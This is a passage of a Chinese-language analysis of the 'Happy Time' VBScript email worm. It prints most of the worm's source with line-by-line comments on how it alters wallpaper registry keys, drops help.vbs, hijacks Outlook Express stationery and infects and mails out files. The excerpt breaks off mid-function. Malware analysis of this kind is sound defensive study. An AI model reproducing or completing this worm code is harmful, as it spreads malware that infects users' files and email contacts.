欢乐时光病毒原码分析[2]

> if lcase(wscript.scriptfullname) <> lcase(f2) then
> fw of, f2, fext
> end if
> end if
> if (cint(cn) mod 366) = 0 then
> if (cint(second(time)) mod 2) = 0 then
> tsend
> else
> adds = og
> msend (adds)
> end if
> end if
> wp = rg("hkey_current_user\control panel\desktop\wallpaper")  --------此处修改注册表墙纸
> if rg(ks & "help\wallpaper") <> wp or wp = "" then
> if wp = "" then
> n1 = ""
> n3 = cs & "\help.htm"                      --------如果墙纸为空，直接设定help.htm为墙纸
> else                                       --------否则修改墙纸文件
> mp = of.getfile(wp).parentfolder           -------设定文件名和路径名
> n1 = of.getfilename(wp)
> n2 = of.getbasename(wp)
> n3 = cs & "\" & n2 & ".htm"
> end if
> set pfc = of.createtextfile(n3, true)
> mt = sa("1100")
> pfc.write "<" & "html><" & "body bgcolor='#007f7f' background='" & n1 & "'><" & "/body><" & "/html>" & mt
> pfc.close
> rw ks & "help\wallpaper", n3
> rw "hkey_current_user\control panel\desktop\wallpaper", n3        --------修改墙纸
> end if
> else
> set fc = of.createtextfile(ds & "\help.vbs", true)                -------在此建立vbs文件
> fc.write sa("0100")
> fc.close
> bf = cs & "\untitled.htm"                          ------------修改outlook express 信纸文件
> set fc2 = of.createtextfile(bf, true)
> fc2.write lhtml
> fc2.close
> oeid = rg("hkey_current_user\identities\default user id")     --------又是注册表
> oe = "hkey_current_user\identities\" & oeid & "\software\microsoft\outlook express\5.0\mail"
> msh = oe & "\message send html"
> cus = oe & "\compose use stationery"
> sn = oe & "\stationery name"
> rw msh, 1                                                   --------写注册表
> rw cus, 1
> rw sn, bf
> web = cs & "\web"
> set gf = of.getfolder(web).files
> od.add "htt", "1100"
> for each m in gf
> fext = getext(of, od, m)
> if fext <> "" then
> fw of, m, fext
> end if
> next
> end if
> end sub
> sub mclose()                           -----------------------close 过程
> document.write "<" & "title>i am sorry!</title" & ">"
> window.close
> end sub
> sub rt()                               -----------------------rt 过程，调用help.vbs
> dim mpath
> on error resume next
> mpath = grf()
> iv mpath, "help.vbs"
> end sub
> function sa(n)                        -----------------------sa 函数，返回病毒文本
> dim vbstext, m
> vbstext = lvbs()
> if mid(n, 3, 1) = 1 then
> m = "<%" & vbstext & "%>"
> end if
> if mid(n, 2, 1) = 1 then
> m = vbstext                            --------------
> end if
> if mid(n, 1, 1) = 1 then
> m = lscript(m)
> end if
> sa = m & vbcrlf
> end function
> sub fw(of, s, n)                           --------------fw 过程，修改文件并发出
> dim fc, fc2, m, mmail, mt
> on error resume next
> set fc = of.opentextfile(s, 1)
> mt = fc.readall
> fc.close
> if not sc(mt) then
> mmail = ml(mt)
> mt = sa(n)